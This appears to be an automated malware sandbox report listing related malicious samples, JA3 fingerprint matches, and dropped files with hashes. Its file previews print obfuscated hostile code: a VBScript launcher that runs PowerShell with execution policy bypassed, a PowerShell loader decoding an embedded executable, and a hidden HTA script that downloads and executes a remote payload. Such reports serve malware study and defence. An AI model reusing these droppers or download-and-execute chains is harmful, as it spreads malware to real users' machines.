                                                                                                                                                                                                                  Appraisal.report.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  NEW PO - CE AUSTRALIA PTY LTD.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.228.147
                                                                                                                                                                                                                  Z0PVKGyuxF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  JZ74.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  b44c460b_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.228.151
                                                                                                                                                                                                                  78a4d352_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.228.151
                                                                                                                                                                                                                  bb37e159_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.128
                                                                                                                                                                                                                  a423d144_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.228.151
                                                                                                                                                                                                                  Appraisal.reportl11004452699001.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.127
                                                                                                                                                                                                                  INTERNET-ARCHIVEUS8KfPvyojv5.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.121
                                                                                                                                                                                                                  Report.110034567733.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.125
                                                                                                                                                                                                                  Report.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.110
                                                                                                                                                                                                                  Appraisal.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Receipt.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.123
                                                                                                                                                                                                                  Appraisal.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  8b664227_by_Libranalysis.pptGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.228.148
                                                                                                                                                                                                                  KUP ZAM#U00d3WIENIE-34002174.pptGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.228.148
                                                                                                                                                                                                                  280fdaa5_by_Libranalysis.pptGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.228.148
                                                                                                                                                                                                                  Property.Report.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.110
                                                                                                                                                                                                                  VCKBY846628.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.118
                                                                                                                                                                                                                  Appraisal.report.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  NEW PO - CE AUSTRALIA PTY LTD.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.228.147
                                                                                                                                                                                                                  Z0PVKGyuxF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  JZ74.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  b44c460b_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.228.151
                                                                                                                                                                                                                  78a4d352_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.228.151
                                                                                                                                                                                                                  bb37e159_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.128
                                                                                                                                                                                                                  a423d144_by_Libranalysis.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.228.151
                                                                                                                                                                                                                  Appraisal.reportl11004452699001.vbsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.127

                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                  54328bd36c14bd82ddaa0c04b25ed9adUrgent Contract Order GH7856648,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  fuoAl0V94I.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Consignment Details&Original BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  2320900000000.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  NEW ORDER 112888#.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Transfer-Advice000601021_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  WcHO1ZGiIn.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  3c2pU82NQD.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  RFQ-sib.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PackedNET.825.24532.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  090049000009000.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  DocumentScanCopy2021_pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PackedNET.831.4134.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  SWIFT COMMERCIAL DUTY 0218J.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  p8Wo6PbOjL.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  b7cgnOpObK.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Invoice 8-6-2021.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  090009000000090.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Urgent Contract Order GH78566484,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  Invoice_OS169ENG 000003893148.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.119
                                                                                                                                                                                                                  • 207.241.224.2
                                                                                                                                                                                                                  • 207.241.232.198
                                                                                                                                                                                                                  • 207.241.227.126
                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19my_attach_82862.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  document-47-2637.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  Fax_Doc#01_5.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  wa71myDkbQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  Current-Status-062021-81197.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  logo.png.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  3F97s4aQjB.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  WcCEh3daIE.xlsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  ATT00005.htmGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  kxjeAvsg1v.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  VSA75RUmYZ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  iX22xMeXIc.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  QWkt5w3cO2.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  #U260e#Ufe0f Zeppelin.com AudioMessage_259-55.HTMGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  vTtOheCXBQ.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  6b6zVfqxbk.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  Check 57549.HtmlGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112
                                                                                                                                                                                                                  audit-78958169.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 207.241.227.112

                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                  C:\Users\Public\-----Run+++++++++.ps1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):780610
                                                                                                                                                                                                                  Entropy (8bit):3.7041478671513444
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:ZWG30D0btNi7GUMC0a4dqWzYnx6fLRNmgvlFw9GMC68jDnyZT1JUOCN3N4mGNY/N:LZtnNqONsZtnNqOg
                                                                                                                                                                                                                  MD5:10305A80924712940646CCA278CEE796
                                                                                                                                                                                                                  SHA1:6DB80D4B3828F14AE105DF2BA8AB3ECCF2AB682F
                                                                                                                                                                                                                  SHA-256:2EC32C9EFDB4BA49EFC12BFDA4EBC8DDE498C618E3746F71BA72DA884F8573C0
                                                                                                                                                                                                                  SHA-512:7EFC040A317BCD3B5F3692F5930ECFEA7CD4C52DD65727ED0C24907D3C01A142FB0F9B805CD21743AB635D1C00E8C4F3DA0D2D8384DCE308C7C296F2A1369C09
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: FUNCTION D4FD5C5B9266824C4EEFC83E0C69FD3FAA($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)..{.. $D4FD5C5B9266824C4EEFC83E0C69FD3FAAx = "Fr"+"omBa"+"se6"+"4Str"+"ing".. $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG = [Text.Encoding]::Utf8.GetString([Convert]::$D4FD5C5B9266824C4EEFC83E0C69FD3FAAx($D4FD5C5B9266824C4EEFC83E0C69FD3FAAE)).. return $D4FD5C5B9266824C4EEFC83E0C69FD3FAAG..}....Function HBar {.. .. [CmdletBinding()].. [OutputType([byte[]])].. param(.. [Parameter(Mandatory=$true)] [String]$H3.. ).. $H2 = New-Object -TypeName byte[] -ArgumentList ($H3.Length / 2).. for ($i = 0; $i -lt $H3.Length; $i += 2) {.. $H2[$i / 2] = [Convert]::ToByte($H3.Substring($i, 2), 16).. }.... return [byte[]]$H2..}..[String]$H4 = '4D5A9----3-------4------FFFF----B8--------------4-----------------------------------------------------------------------8--------E1FBA-E--B4-9CD21B8-14CCD21546869732-7-726F6772616D2-63616E6E6F742-62652-72756E2-696E2-444F532-6D6F64652E-D-D-A24----------
                                                                                                                                                                                                                  C:\Users\Public\Run\Run.vbs
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):433
                                                                                                                                                                                                                  Entropy (8bit):4.896166781572193
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:jaiugaiuTfhUZDiwgARQpSt0rBvxF4mlvIkWFFiw/5JTxz3iuw:jpuwuTSZDirAerxD4iIPFFiYJTcuw
                                                                                                                                                                                                                  MD5:B61084C93B7923021799A1F3D9756182
                                                                                                                                                                                                                  SHA1:9744FD3D75F7F1A6DFB2B3F8C52F21551A96036D
                                                                                                                                                                                                                  SHA-256:70D7CBCE07A5D72764B38923ADE703FAE0BD6FFB2AA435D8A6988E6C66EC89BB
                                                                                                                                                                                                                  SHA-512:ADA6AA5E741F4548050D3CC5D1D700D1B8619F65E44F1D009396E218763F01A255DA170B31E454D44ADF6D7AC714A4477A5A47A7FE27FE8EBD8BA8A0F782EF9D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Preview: Dim FDGFDHGFJGKUGK..Set FDGFDHGFJGKUGK= CreateObject("WScript.Shell")..HVJHGJYGUGKUGU="po"..HHGJUGLHIUGUGKUG="wers"..KUHIHGKYFUYTFUYUYFU="hell -ExecutionPolicy "..DHYJGKUGKUGFUTYTFUY = " Bypass &"..GFDRYTFUGUTUYURFUTR ="'C:\Users\Public"..DTFYHJGJGJYGUTRYTFY = "\-----Run+++++++++.ps1'"..OK = HVJHGJYGUGKUGU+HHGJUGLHIUGUGKUG+KUHIHGKYFUYTFUYUYFU+DHYJGKUGKUGFUTYTFUY++GFDRYTFUGUTUYURFUTR+DTFYHJGJGJYGUTRYTFY+""..FDGFDHGFJGKUGK.Run OK,0
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xGrfj8RvYg.exe.log
                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\xGrfj8RvYg.exe
                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):226
                                                                                                                                                                                                                  Entropy (8bit):5.354940450065058
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                                                                                                                                                                                  MD5:B10E37251C5B495643F331DB2EEC3394
                                                                                                                                                                                                                  SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                                                                                                                                                                                  SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                                                                                                                                                                                  SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt
                                                                                                                                                                                                                  Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                  Size (bytes):1295
                                                                                                                                                                                                                  Entropy (8bit):5.23215309792381
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:Msp1CIvQmYnlJAGbRUGgSWGQMgnibRFYMbW:np1Cn/A5G5QM3RFPbW
                                                                                                                                                                                                                  MD5:A3B75BE1163014E2F01E87ADC2D49724
                                                                                                                                                                                                                  SHA1:9F8DB267FC3F9263651BDBDABD04FC4B940B0123
                                                                                                                                                                                                                  SHA-256:5A7102CD16FBC915648876A6419231546ADC9E04D50C0F9B71E5D922CA10D9B5
                                                                                                                                                                                                                  SHA-512:2A9CFE2A8B9B90FBC2F866AE294EB422B2926A726CC1674441E216509C07EB07CF65803FE7B59791EB7E393BA278C2E8720D4A00E9E1E64474E32C811D2F869D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                  • Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Clean_lol123[1].txt, Author: Arnim Rupp
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  IE Cache URL:https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
                                                                                                                                                                                                                  Preview: <HTML>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<HEAD>..<script language="VBScript">..Window.ReSizeTo 0, 0..Window.moveTo -7000,-7000..Dim FFFFFFFFFFFFFFF..Set FFFFFFFFFFFFFFF= CreateObject("WScript.Shell")..EEEEEEEEEEE="p"..OOOOOOOOOOOOOO = "O"+"We"..ZZZZZZZZZZZZZZZZZ ="RsHe"..BBBBBBBBBBBBBBBBBBBBB = "L"..VVVVVVVVVVVVVVV ="L $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEE
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11883
                                                                                                                                                                                                                  Entropy (8bit):4.890750684634174
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:4Vsm5emlQib4NxoeR93YrKkX9smlp5b4Q2Ca6pZlbjvwRjdHPRhjiMDOmEN3H+O8:4kib4WF43opbjvwRjdvRZiQ0HzAFaib9
                                                                                                                                                                                                                  MD5:6049E98CE5D644576C54D3F4844468ED
                                                                                                                                                                                                                  SHA1:58E3D61381D54FD51C0C913940FF9B952189A5D8
                                                                                                                                                                                                                  SHA-256:354ADD5966932A0ED1ABE70FE8A1850B215564290661E34E1FBCEB7989AA5803
                                                                                                                                                                                                                  SHA-512:44878B4BD939DFDB1B34EAEB94280E723FDC3068A1FFC56FA902906669DBDD88F8FEEECC2BE79E838A0841EFBCEE909765F9DE0BAFF01598436C8AC1F6956EAC
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                                                  Preview: PSMODULECACHE......<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4sskfsz.fda.psm1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ligmpoba.nku.ps1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vivyprwg.nre.ps1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdrybsou.rmb.psm1
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: 1
                                                                                                                                                                                                                  C:\Users\user\Documents\20210611\PowerShell_transcript.715575.7kfD7GZs.20210611063402.txt
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2162
                                                                                                                                                                                                                  Entropy (8bit):5.252882108289744
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:BZqvhqZoOG/A5G5QMTbqDYB1Zb/A5G5QMc:BZ2hqZNG/3Q4qDo1Zb/3QD
                                                                                                                                                                                                                  MD5:9B86905AA5C26D14CF48E674C74987F8
                                                                                                                                                                                                                  SHA1:379EFDA2ACCBB4A6CBA9B77A3FACD0D68C4097E1
                                                                                                                                                                                                                  SHA-256:9445D96838C2D5DA7DBD32319509019267D583FBB58F9C45EAF36D893B749DE2
                                                                                                                                                                                                                  SHA-512:4C9E0C3607A22EB5D5F21EEA152213F7A1FAA99B8D0A79900926E0DE41015FDC760714456C565D8B957EFE7AD260C4FEFE54EC42DA0F2CAC0423FE322B9BD039
                                                                                                                                                                                                                  Malicious:false
